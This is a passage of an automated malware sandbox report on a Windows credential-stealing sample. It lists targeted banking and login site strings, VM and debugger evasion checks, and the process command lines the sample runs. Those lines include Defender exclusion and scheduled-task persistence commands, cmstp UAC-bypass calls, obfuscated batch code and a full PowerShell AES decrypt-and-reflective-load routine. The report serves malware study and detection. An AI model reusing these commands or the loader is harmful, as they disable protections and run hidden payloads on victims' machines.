                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: taskmen.exe, 00000020.00000002.4543464528.00000000013B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: taskmoder.exe, 0000001F.00000002.3027507006.00000000029E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q(C:\ProgramData\VMware\VMware Workstation
                        Source: taskmoder.exe.0.drBinary or memory string: vmware
                        Source: taskmoder.exe, 0000001F.00000002.3027507006.0000000002AB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q(C:\ProgramData\VMware\VMware WorkstationLR]q
                        Source: taskmoder.exe, 0000003E.00000002.4515953149.00000000015A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: Client (1).vmp.exe, 00000023.00000002.4507863316.0000000000765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: taskmoder.exe, 0000001F.00000000.2318415133.000000000051A000.00000002.00000001.01000000.0000000F.sdmp, taskmoder.exe, 0000001F.00000002.3027507006.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, taskmoder.exe, 0000001F.00000002.3027507006.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, taskmoder.exe.0.drBinary or memory string: HYPER-V
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: discord.comVMware20,11696428655f
                        Source: taskmoder.exe, 0000001F.00000002.2945939583.0000000000CC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Microsoft Hyper-V\Hyper-V.exe
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: taskmoder.exe, 0000001F.00000000.2318415133.000000000051A000.00000002.00000001.01000000.0000000F.sdmp, taskmoder.exe.0.drBinary or memory string: XENQEMU
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: taskmoder.exe.0.drBinary or memory string: BOCHSsC:\Program Files\VMware\VMware Workstation\vmware-vmx.execC:\Program Files\Oracle\VirtualBox\VBoxManage.exe]C:\Program Files\Microsoft Hyper-V\Hyper-V.exeQC:\ProgramData\VMware\VMware WorkstationwSOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: Winscreen.exe, 00000000.00000002.2359805409.0000000002036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEEeWP
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: explorer.exe, 00000007.00000002.2146776172.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2204270378.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, taskmoder.exe, 0000001F.00000002.2919735556.0000000000C22000.00000004.00000020.00020000.00000000.sdmp, taskmoder.exe, 00000030.00000002.4508994559.0000000000F37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Client (1).vmp.exe, 00000025.00000002.2496622625.0000000000CC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: taskmoder.exe, 0000001F.00000002.2943524709.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\ProgramData\VMware\VMware Workstation
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: taskmoder.exe, 0000001F.00000002.3027507006.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, taskmoder.exe, 0000001F.00000002.3027507006.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, taskmoder.exe, 0000001F.00000002.3027507006.00000000029E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q.C:\Program Files\Microsoft Hyper-V\Hyper-V.exe
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Hides threads from debuggers
                        Source: C:\Users\user\Desktop\Winscreen.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: KernelDebuggerInformation
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess queried: DebugObjectHandleJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess queried: DebugObjectHandle
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC276D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6FDC276D8
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC30D20 GetProcessHeap,34_2_00007FF6FDC30D20
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess token adjusted: Debug
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess token adjusted: Debug
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess token adjusted: Debug
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC276D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6FDC276D8
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC23170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6FDC23170
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC22510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF6FDC22510
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC23354 SetUnhandledExceptionFilter,34_2_00007FF6FDC23354
                        Source: C:\Users\user\Desktop\Winscreen.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell decode and execute
                        Source: Yara matchFile source: amsi32_6676.amsi.csv, type: OTHER
                        Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe'
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe'Jump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,34_2_00007FF6FDC1B190
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "upx" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\upx.exe" /RL HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\upx.exe "C:\Users\user\AppData\Roaming\upx.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "taskmoder" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\taskmoder.exe" /RL HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\taskmoder.exe "C:\Users\user\AppData\Roaming\taskmoder.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Local\Temp\taskmen.exe "C:\Users\user\AppData\Local\Temp\taskmen.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.infJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\ydztkyrb.exe C:\Windows\temp\ydztkyrb.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\swtpd1aw.exe C:\Windows\temp\swtpd1aw.exe
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "taskmoder.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\izjuqhimv.vbs"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c @echo off Set a1zr=YNB0FrMP4GIJbxjaqUsk6Cc5ERiHfyAhvwD31pOL7WdnQSKtu8goe2lTX9ZmzV cls @%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1% %a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%a1zr:~31,1%%a1zr:~52,1%%a1zr:~54,1%%a1zr:~54,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~52,1%%a1zr:~13,1%%a1zr:~37,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~5,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%" /%a1zr:~28,1% %a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~17,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1% /%a1zr:~47,1% %a1zr:~25,1%%a1zr:~24,1%%a1zr:~9,1%_%a1zr:~45,1%%a1zr:~58,1% /%a1zr:~42,1% "%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~18,1%%a1zr:~29,1%%a1zr:~18,1%%a1zr:~47,1%%a1zr:~52,1%%a1zr:~59,1%%a1zr:~35,1%%a1zr:~53,1%\%a1zr:~48,1%%a1zr:~18,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~26,1%%a1zr:~47,1%.%a1zr:~52,1%%a1zr:~13,1%%a1zr:~52,1%,%a1zr:~21,1%:\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1%\%a1zr:~47,1%%a1zr:~15,1%%a1zr:~18,1%%a1zr:~19,1%%a1zr:~59,1%%a1zr:~52,1%%a1zr:~43,1%.%a1zr:~52,1%%a1zr
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\winsin.bat"
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\Client.exe "C:\Windows\Client.exe"
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\fail.bat"
                        Source: C:\Windows\Client.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                        Source: C:\Windows\Client.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($param_var,$param2_var){ $aTurZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxyRp=$aTurZ.EntryPoint; $kxyRp.Invoke($null, $param2_var);}$iIPOn = 'C:\Windows\fail.bat';$host.UI.RawUI.WindowTitle = $iIPOn;$JhMMH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iIPOn).Split([Environment]::NewLine);foreach ($ELdqw in $JhMMH) { if ($ELdqw.StartsWith('nZYsDSkVsFscZBoRZGdc')) { $wHkKi=$ELdqw.Substring(20); break; }}$payloads_var=[string[]]$wHkKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
